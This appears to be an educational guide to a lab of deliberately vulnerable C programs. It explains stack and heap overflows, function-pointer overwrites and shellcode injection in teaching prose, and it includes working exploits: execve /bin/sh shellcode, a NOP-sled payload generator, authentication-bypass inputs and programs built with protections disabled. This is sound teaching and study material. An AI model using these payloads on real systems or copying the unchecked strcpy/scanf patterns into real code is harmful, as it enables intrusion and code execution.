This is a collection of small demo programs written in C that are vulnerable to overflows and other exploits.
- Background and general explanations
- Setup
- Hackme 1 executes whatever shellcode is inserted. The attacker can use it to start a shell.
- Hackme 2 checks a password, but a buffer overflow makes it possible to bypass the authentication.
- Hackme 3 has a function pointer that can be overwritten with a buffer overflow, causing the user to hit the jackpot.
- Hackme 4 can be tricked to execute shellcode from the environment variables to print "hacked!"
- Hackme 5 can be manipulated with a buffer overflow to execute code on the stack, in this case to start a new shell.
- Hackme 6 has a heap overflow vulnerability that can be exploited to display the contents of a secret file.
The memory of a program is separated into different parts, including text (for the code), data, bss, heap and stack. The data segment holds initialized static and global variables; the bss segment holds uninitialized static and global variables. The heap is used for dynamic memory obtained with malloc() (or new in C++), and the stack contains local variables and some other information. When a function is executed, it uses the stack to store its local variables, parameters for the functions it calls, and some information about the control flow. For example, when a function is called, the program has to save the address of the instruction that follows the call, so that it can return later and resume execution there. This return address is saved on the stack and later retrieved from there.
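The segments described above can be made visible with a small sketch that prints one example address per region. It is not part of the hackme programs; the names initialized_global, uninitialized_global and print_memory_regions are made up for this illustration, and the printed addresses differ between systems and runs.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int initialized_global = 42;   /* data segment: has an explicit initial value */
int uninitialized_global;      /* bss segment: zero-filled at program start */

/* Prints one example address per memory region to the given stream.
 * Returns 0 on success, -1 if the heap allocation failed. */
int print_memory_regions(FILE *out)
{
    int local_variable = 7;                              /* lives on the stack */
    int *heap_variable = malloc(sizeof *heap_variable);  /* lives on the heap */
    if (heap_variable == NULL)
        return -1;
    *heap_variable = local_variable;

    /* A function address lies in the text segment. */
    fprintf(out, "text  (code):          %p\n",
            (void *)(uintptr_t)print_memory_regions);
    fprintf(out, "data  (initialized):   %p\n", (void *)&initialized_global);
    fprintf(out, "bss   (uninitialized): %p\n", (void *)&uninitialized_global);
    fprintf(out, "heap  (malloc):        %p\n", (void *)heap_variable);
    fprintf(out, "stack (local):         %p\n", (void *)&local_variable);

    free(heap_variable);
    return 0;
}
```

Calling print_memory_regions(stdout) from a main function typically shows the stack address far away from the other four.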
Information is also kept in registers. The instruction pointer (called RIP on 64-bit x86) points to the next instruction the program will execute. The stack pointer (RSP) points to the top of the stack, where values are pushed onto or popped from the stack. The base pointer (RBP) points to the base of the stack frame of the current function. At the location RBP points to lies the saved RBP of the function that called this function, and directly behind it (at RBP+8) the return address that is used to jump back.
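As a rough illustration of the saved frame information, GCC and Clang offer two builtins that expose the frame address and the return address of the current function. This is only a sketch: the builtins are compiler extensions rather than standard C, and the function names saved_return_address and current_frame_address are invented here.

```c
#include <stddef.h>

/* Returns the address this function will return to.
 * __builtin_return_address is a GCC/Clang extension, not standard C. */
__attribute__((noinline))
void *saved_return_address(void)
{
    return __builtin_return_address(0);
}

/* Returns the frame address of this function. On x86-64 with frame
 * pointers in use (e.g. at -O0) this is the value RBP has inside the
 * function; other targets and optimization levels may differ. */
__attribute__((noinline))
void *current_frame_address(void)
{
    return __builtin_frame_address(0);
}
```

Printing both values with %p inside gdb and comparing them with the output of info frame is one way to check the layout on a given system.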
Some vulnerabilities in code make it possible to manipulate the stack, e.g. to overwrite the return address, which causes the program to jump to a different place in memory and possibly execute instructions there. One way this can happen is through a buffer overflow. A buffer is a designated block of memory that stores values of the same type, e.g. an array of integers or a string (an array of chars). The buffer has a fixed amount of memory, but if it is not managed correctly, more bytes can be written to the buffer than intended, causing the data to overwrite whatever comes next on the stack, maybe even the return address (see image). Variables are stored on the heap as well, and overflows there can be used in a similar way to overwrite values and manipulate the program.
Sometimes, it is possible for an attacker to insert instructions that were not originally part of the program, causing it to do whatever the attacker wants. That is generally done by injecting shellcode, the binary representation of assembler instructions. When shellcode is passed to a program via stdin or as an argument, it is usually cut off at the first null byte, because C strings end there. Therefore, the assembler code has to be written in a way that avoids null bytes in its binary representation.
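To make the null byte problem concrete, the following sketch scans a byte sequence for the first 0x00. The helper first_null_byte and the two sample arrays are made up for this example. The arrays hold two encodings that put 0x3b into RAX: the straightforward one carries a zero-padded 32-bit immediate, the second one avoids zero bytes.

```c
#include <stddef.h>

/* Returns the index of the first 0x00 byte in code[0..len), or -1 if none. */
long first_null_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            return (long)i;
    }
    return -1;
}

/* mov $0x3b, %rax : the 32-bit immediate is padded with zero bytes */
const unsigned char mov_rax_wide[] = { 0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00 };

/* xor %rax, %rax ; mov $0x3b, %al : same value in RAX, no zero bytes */
const unsigned char mov_al_short[] = { 0x48, 0x31, 0xc0, 0xb0, 0x3b };
```

A string function such as strcpy would stop copying the first variant after its fourth byte, which is why the shellcode in the later sections uses the second style.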
For a comprehensive introduction to the topic of buffer overflows and executing shellcode on the stack, see "Smashing the Stack for Fun and Profit".
To compile all files with the required flags, execute
./compile-all.sh
All code is compiled with some flags that make it easier to execute exploits: -fno-stack-protector to omit stack canaries, -z execstack to make the stack executable, and -O0 to disable optimizations. All exploits are written for a 64-bit architecture and were tested on Ubuntu 18.04. The full command is, for example,
gcc hackme1.c -o hackme1 -O0 -fno-stack-protector -z execstack -g
(-g adds debug information for gdb). The script also disables ASLR (address space layout randomization), which helps because the memory addresses then stay the same between two executions of the program.
The exploits are generally executed with ./hackmeX $(./exploitX) if the exploit is passed as a parameter, or with ./exploitX | ./hackmeX if it is read from stdin.
There is also a script, makeshellcode.sh, which automatically generates the bytes for the assembly instructions specified in shellcode-creator.c. It does so by starting gdb and using its disass command to look at the bytes, which speeds up the otherwise manual inspection. However, it stops at the first ret instruction it encounters. As long as the shellcode does not contain a ret instruction, this is not a problem; otherwise, the bytes have to be worked out manually.
To warm up, let's have a look at a program that was made to be exploited. This is the source code of hackme1.c:
int main(void)
{
char shellcode[] = "[shellcode here]";
(*(void (*)()) shellcode)();
return 0;
}
This very simple program takes some shellcode and executes it. This is possible because the array shellcode is cast to the function pointer type void (*)(), a pointer to a function with an unspecified number of parameters. The program then calls through that pointer, essentially running the shellcode.
In exploit1.c, the inserted shellcode sets the registers correctly and then executes a syscall that starts a new shell. The following assembly instructions achieve this while avoiding any null bytes. There are, however, many other ways to achieve the same goal.
"jmp j2;" //jump forward to the call, so that the call goes backwards and its offset contains no null bytes
"j1: jmp start;" //jump to the rest of the shellcode
"j2: call j1;" //put the address of the string /bin/sh on the stack
".ascii \"/bin/shX\";"
"start: pop %rdi;" //take the address of the string /bin/sh from the stack
"xor %rax, %rax;" //set RAX to zero
"movb %al, 7(%rdi);" //overwrite the placeholder X with a null byte to terminate the string /bin/sh
"mov $0x3b, %al;" //put the syscall number in RAX, in this case 0x3b for execve
"xor %rsi,%rsi;" //RSI must be set to zero
"xor %rdx,%rdx;" //RDX must be set to zero
"syscall;" //start the syscall
Since this program is not actually exploited but simply executes the shellcode itself, just run ./exploit1 to try it out with the shellcode payload.
The first example was created specifically to execute shellcode. From now on, the examples will be programs that have other purposes, but contain vulnerabilities that can be exploited.
Hackme2 contains a buffer overflow vulnerability that can be used to manipulate a variable. The program takes an input as argument and checks if that input is correct, displaying either "password correct" or "wrong password". Of course, it might execute some other functionality, but this is just a minimal example. The goal here is to get the program to execute the code for the correct password, without actually entering the correct password (assuming the hacker doesn't know it). If the program crashes afterwards, that's okay, since the goal was reached already.
The program can simply be executed with ./hackme2 mypassword. This is the source code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_password(char *password){
int correct = 0;
char password_buffer[16];
strcpy(password_buffer, password);
if (strcmp(password_buffer, "actualpw") == 0) {
correct = 1;
}
return correct;
}
int main (int argc, char *argv[]) {
if (argc < 2) {
puts("Please enter your password as a command line parameter.");
} else {
if (check_password(argv[1])) {
printf("Password correct.\n");
} else {
printf("Wrong password.\n");
}
}
return 0;
}
In the check_password function, a buffer of 16 bytes is created to store the password. There is also a variable int correct that contains 0 if the password is wrong and 1 if the password was evaluated to be correct. This local variable is placed on the stack (here at location rbp-8, directly above the base pointer of the stack frame). At the end of the function, it is loaded into the register eax, which can be seen in the disassembled code of check_password at offset +68. The main function then checks whether eax is zero (with the test %eax, %eax instruction at offset +54) and jumps to the corresponding output. When "actualpw" is passed to the program as a parameter, the variable correct contains 0x00000001 and is therefore not zero, causing the program to display "Password correct.".
When the buffer in check_password is filled with bytes, it grows in the direction of the variable correct. An input that is sufficiently longer than the 16 bytes of the buffer overwrites the variable, so that it contains e.g. 0x41414141 (the ASCII codes of "AAAA"), which is also evaluated to be not zero. The main function therefore jumps into the "Password correct." branch once more, even though the correct password was never entered.
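The effect can be reproduced without undefined behavior by modelling the two locals as one struct and copying into the struct as a whole. This is only a sketch under the assumption that correct directly follows the buffer; the real stack layout is chosen by the compiler, and frame_model and correct_after_copy are names invented for this example.

```c
#include <stddef.h>
#include <string.h>

/* A model of the two locals of check_password. It only assumes that
 * correct is placed behind the buffer; real frames may contain padding. */
struct frame_model {
    char password_buffer[16];
    int correct;
};

/* Copies len bytes of input over the model, like an unchecked strcpy
 * would, and returns the resulting value of correct. The copy is clamped
 * to the size of the struct so the demonstration itself stays memory-safe. */
int correct_after_copy(const char *input, size_t len)
{
    struct frame_model frame;
    memset(&frame, 0, sizeof frame);
    if (len > sizeof frame)
        len = sizeof frame;
    memcpy(&frame, input, len);
    return frame.correct;
}
```

With an 8 byte input such as "actualpw" the function returns 0, because only the buffer is touched. With 20 bytes of 'A' the last four bytes land in correct, which then holds 0x41414141 and would be treated as true.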
The program exploit2 just produces the required number of bytes as output. Run both with ./hackme2 $(./exploit2).
Hackme3 is a little game with an element of chance. If two random three-digit numbers are the same, the user hits the jackpot and wins a lot of money. However, the program uses a function pointer to jump to the part of the code where the game is executed, and the length of the username, which is stored in a buffer on the stack, is not checked at all. The function pointer can be overwritten just like any other variable. This can be used to the player's advantage, making the game pay out a jackpot without even crashing in the process!
This is the code for the program:
#include "string.h"
#include "stdio.h"
#include "time.h"
#include "stdlib.h"
void jackpot()
{
printf("\n\n$$$ You hit the jackpot!!! $$$\nAll money will be transferred to your account immediately.\n\n");
return;
}
void play()
{
srand(time(0));
int random = rand()%1000;
int number = rand()/10000000;
printf("\n\n======PLAYING THE GAME=====\n");
printf("The lucky number today is: %d\n", random);
printf("You rolled: %d.\n", number);
if (number == random){
jackpot();
} else {
printf("Sadly, this means you didn't win.\n");
}
return;
}
int main()
{
void (*functionptr)();
functionptr = &play;
char name[8]; // first name of the player
printf("Welcome to this game of luck! What is your fist name:\n");
scanf("%s",name);
functionptr();
printf("Game finished.\n");
return 0;
}
The attacker only needs to choose the username in such a way that the buffer spills over into functionptr, which is saved on the stack directly next to the name buffer. Instead of pointing to play(), functionptr should be made to point to jackpot() directly. The address of jackpot() might start with null bytes, but the attacker only has to overwrite the bytes that need to be changed. The input string \xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xca\x47\x55\x55\x55\x55 consists of 8 bytes that can be anything (stored as the user's name), followed by the address of jackpot() in little-endian byte order. Because the name is read from stdin with scanf, the exploit is piped into the program with ./exploit3 | ./hackme3. (The address will probably have to be changed for the exploit to work on another system. Just run the program in gdb and use disass jackpot to see the address that is needed.)
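The byte order of the address in the input string can be checked with a short sketch. It assumes the example address 0x5555555547ca, which is simply the value encoded in the input string above; encode_le64 and significant_bytes are hypothetical helper names.

```c
#include <stddef.h>
#include <stdint.h>

/* Writes addr into out[0..7] in little-endian order (lowest byte first),
 * which is how x86-64 stores pointers in memory. */
void encode_le64(uint64_t addr, unsigned char out[8])
{
    for (size_t i = 0; i < 8; i++)
        out[i] = (unsigned char)((addr >> (8 * i)) & 0xff);
}

/* Returns how many low-order bytes of addr have to be written. The
 * remaining high-order bytes are zero and can be left untouched if the
 * overwritten pointer already has zeros there. */
size_t significant_bytes(uint64_t addr)
{
    size_t count = 0;
    while (addr != 0) {
        count++;
        addr >>= 8;
    }
    return count;
}
```

For 0x5555555547ca the encoded bytes are ca 47 55 55 55 55 00 00, and only the first six have to be sent, which matches the tail of the input string.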
This time, the goal is to make hackme4 execute a syscall that was not originally present in the code. For example, an attacker could make the program print "hacked!" on the screen with the write syscall. To achieve this, the assembler instruction syscall has to be executed with register RSI containing the address of the string that should be printed, RDX containing the length of the string, and RAX and RDI both containing the value 1 (the syscall number of write and the file descriptor of stdout, respectively). Possible shellcode for this without using any null bytes could look like this:
eb 02 jmp 0x4
eb 0d jmp 0x11
e8 f9 ff ff ff call 0x2
68 61 63 6b 65 64 21 0a string "hacked!\n"
5e pop rsi
48 31 c0 xor rax,rax
48 ff c0 inc rax
48 89 c7 mov rdi,rax
48 89 c2 mov rdx,rax
48 c1 e2 03 shl rdx,0x3
0f 05 syscall
The first three instructions save the address of the string on the stack. Then, this address is taken from the stack and put in register RSI. Next, the register RAX is cleared to zero by XORing it with itself. RAX is then set to 1 with an increment. Then, RDI and RDX are also set to 1 by copying the value from RAX. A left shift by 3 changes the value in RDX to 8, the length of the string including the newline. Finally, the syscall is executed. This code invokes the write syscall and prints "hacked!" to the screen. It is saved in the file shellcode.bin.
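For comparison, this is roughly what the shellcode does when written as ordinary C with the POSIX write() wrapper. It is a sketch for orientation only and not code from the repository; say_hacked is a made-up name, and the file descriptor is a parameter so that the function can be tried with something other than stdout.

```c
#include <unistd.h>

/* Writes "hacked!\n" to the file descriptor fd and returns the result of
 * write(), i.e. the number of bytes written or -1 on error. */
ssize_t say_hacked(int fd)
{
    static const char message[] = "hacked!\n";
    /* Register contents in the shellcode version:
     * RAX = 1 (syscall number of write), RDI = fd (1 for stdout),
     * RSI = address of the message, RDX = 8 (length without the
     * terminating null byte). */
    return write(fd, message, sizeof message - 1);
}
```

Calling say_hacked(1) prints the message on stdout, just like the shellcode.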
But how would a hacker put this shellcode into the target program? The whole program is quite small, and there is only a buffer of 8 bytes.
#include <string.h>
void insecure(char* input){
char buf[8];
strcpy(buf,input);
return;
}
int main(int argc, char *argv[])
{
insecure(argv[1]);
return 0;
}
An attacker can overwrite the return address (the saved RIP) stored in the stack frame of insecure() to jump somewhere else and execute shellcode. However, there is not much space on the stack of the program to hold all the shellcode. There is another option: the attacker can put the shellcode in an environment variable, which is also accessible on the stack at runtime. This is achieved with the command export SHELLCODE=$(cat shellcode.bin). If the program is now run in gdb and the stack is examined all the way at the bottom, the environment variable can be found there.
Now all there is to do is to fill the buffer for the argument to hackme4 with 8 bytes of meaningless content, followed by the 8 byte address of the environment variable on the stack. In exploit4, there is a somewhat flexible function that calculates this position at runtime, taking the name of the environment variable as an argument. Look at the source code for more details. Now, if the hacker starts the program with ./hackme4 $(./exploit4 SHELLCODE), the shellcode is executed and prints "hacked!".
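How the position of an environment variable can be found at runtime may be sketched as follows. This is not the function from exploit4, only a minimal illustration with the invented name env_value_address. It reports the address inside the process that calls it; the address inside hackme4 can differ slightly, for example because the program name is stored on the stack as well.

```c
#include <stdint.h>
#include <stdlib.h>

/* Returns the address of the value of the environment variable name in
 * the current process, or 0 if the variable is not set. */
uintptr_t env_value_address(const char *name)
{
    const char *value = getenv(name);
    return (uintptr_t)value;
}
```

After export SHELLCODE=$(cat shellcode.bin), printing env_value_address("SHELLCODE") with %lx gives a first estimate that can then be verified in gdb.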
For this example, the goal is to execute arbitrary commands that were not programmed into hackme5.c. This time, a generous buffer is present, and the shellcode can be placed directly in the buffer that causes the overflow.
This is the original source code:
#include<stdio.h>
#include<string.h>
int main(int argc, char *argv[])
{
char buf[256];
if (argc < 2)
puts("Please enter your name as a command line parameter.");
else
{
strcpy(buf,argv[1]);
printf("Input was: %s\n",buf);
return 0;
}
}
This program accepts a parameter and then writes it out again. However, the length of the parameter is not checked, and if it exceeds the 256 byte buffer, an overflow occurs. This makes it possible to overwrite the return address, causing the program to jump elsewhere.
More specifically, the program can be made to jump up on the stack into the area of the buffer itself. If the buffer was filled with data that can also be interpreted as instructions, they can then be executed. By putting in the instructions to execute a syscall that starts a shell, the program will do exactly that. Shellcode for starting a new shell was already created for hackme1, so it can be used again here. exploit5.c produces a string of bytes that represents this shellcode, which can be fed into the vulnerable program with ./hackme5 $(./exploit5).
When the return address is overwritten with an address within the stack, execution follows it and lands in a sequence of NOP instructions. This NOP sled accounts for small variations in the size and position of the stack. The next instructions prepare the execve syscall. The number of the syscall must be placed in register RAX. Registers RDX and RSI have to be zero for this example. RDI needs to point to a string that contains the name of the program to execute, in this case /bin/sh.
Since it is not known in advance at which address this string will end up, the address is put on the stack with a call instruction, which was not intended for this hacky purpose but serves it well. call pushes the address of whatever directly follows it onto the stack, adjusts the stack pointer, and then jumps to its target. Because the bytes that follow the call are not an instruction but the string itself, an attacker can get the address of the string at runtime by simply popping it from the stack again. Of course, there are many other ways to achieve the same outcome. The shellcode presented here contains no null bytes because it has to be passed as a parameter to the program.
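The final payload for executing the exploit is generated by exploit5.c. The payload starts with a NOP sled (\x90 bytes), which is printed in front of the shellcode. The \xaa bytes near the end are padding that moves the address at the very end to the position of the saved return address. The final six bytes are the new return address in little-endian byte order.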
#include <stdio.h>
#include <string.h>
char shellcode[] = "\xeb\x02\xeb\x0d\xe8\xf9\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xaa\xaa\xaa\xaa\xaa\xaa\x08\xdd\xff\xff\xff\x7f";
int main()
{
int i;
for (i = 0; i < (256 - strlen(shellcode) + 8 + 6); i++)
{
printf("\x90");
}
printf("%s",shellcode);
return 0;
}
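The length arithmetic in the loop above can be written out as a small helper. This is a sketch with invented names (build_payload, distance_to_return), and it assumes what the loop bound suggests: 256 bytes of buffer plus 8 bytes of saved RBP lie in front of the return address, of which 6 bytes are overwritten. The tail stands for the shellcode, padding and address bytes; the sketch treats it as opaque data.

```c
#include <stddef.h>
#include <string.h>

#define NOP 0x90

/* Fills out with a NOP sled followed by tail, so that the last
 * address_bytes of the tail end up directly behind distance_to_return
 * bytes. Returns the total payload length, or 0 if the tail is too long
 * or out is too small. */
size_t build_payload(unsigned char *out, size_t out_size,
                     size_t distance_to_return, size_t address_bytes,
                     const unsigned char *tail, size_t tail_len)
{
    size_t total = distance_to_return + address_bytes;
    if (tail_len > total || total > out_size)
        return 0;

    size_t sled_len = total - tail_len;   /* same value as the loop bound above */
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, tail, tail_len);
    return total;
}
```

With the 46 byte string from above, a distance of 256 + 8 and 6 address bytes, the sled is 224 bytes long and the whole payload has 270 bytes.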
When the exploit is executed with ./hackme5 $(./exploit5), a new shell is spawned.
This time, the heap is used to create an overflow. There are two files on the file system, public.txt and secret.txt. Hackme6 takes the username as an argument, greets the user and then, without any intended connection to the username, displays the content of public.txt. However, since all the data is stored on the heap, an overflow of the username can overwrite the name of the file to read, causing the program to display the contents of secret.txt.
This is the source code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
//a struct to hold information about a file
struct file
{
int id;
char filename[8];
};
//a struct to hold information about a user
struct user
{
int id;
char name[8];
};
int main (int argc, char **argv)
{
if (argc < 2) {
puts("Please enter your name as a command line parameter.");
}
else {
//creating a user and a file
struct user *userptr;
userptr = malloc(sizeof(struct user));
struct file *fileptr;
fileptr = malloc(sizeof(struct file));
fileptr->id = 1;
strcpy(fileptr->filename, "public.txt");
//setting the user information - on the heap, this might overwrite the information of the file
userptr->id = 1;
strcpy(userptr->name, argv[1]);
printf("Welcome, user %s!\n\n", userptr->name);
//opening some file, supposedly the file public.txt
printf("On an unrelated note, opening %s.\n", fileptr->filename);
FILE *readfile;
readfile = fopen (fileptr->filename, "r");
if (readfile == NULL) {
fprintf(stderr, "Error opening file\n\n");
exit (1);
}
//printing the file contents
printf("File was successfully opened. It contains: \n");
int c;
while ((c = getc(readfile)) != EOF)
putchar(c);
putchar('\n');
}
return 0;
}
The space for the user information is allocated on the heap first, and the space for the file is allocated after it. However, the user information is written only after the file name has been set. Because the name is copied with strcpy without any length check, a sufficiently long name runs past the user struct and overwrites what was stored for the file, e.g. by placing the string "secret.txt" at exactly the place where fileptr->filename points to, causing the program to load secret.txt.
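How many filler bytes are needed before "secret.txt" depends on the distance between the two allocations. The following sketch computes it from the two chunk addresses; name_to_filename_distance is a hypothetical helper, and the addresses themselves would come from gdb or from printing userptr and fileptr. The spacing is decided by the allocator (a typical 64-bit glibc often places such small chunks 32 bytes apart, but this is an assumption that should be checked on the target system).

```c
#include <stddef.h>
#include <stdint.h>

/* Same layout as the structs in the program above. */
struct file {
    int id;
    char filename[8];
};

struct user {
    int id;
    char name[8];
};

/* Returns the number of bytes between userptr->name and
 * fileptr->filename, given the start addresses of both allocations.
 * A positive result is the number of filler bytes that have to precede
 * the new file name in the overflowing input. */
ptrdiff_t name_to_filename_distance(const void *user_chunk, const void *file_chunk)
{
    uintptr_t name = (uintptr_t)user_chunk + offsetof(struct user, name);
    uintptr_t filename = (uintptr_t)file_chunk + offsetof(struct file, filename);
    return (ptrdiff_t)(filename - name);
}
```

If the two allocations turn out to be 32 bytes apart, the input consists of 32 filler bytes followed by secret.txt.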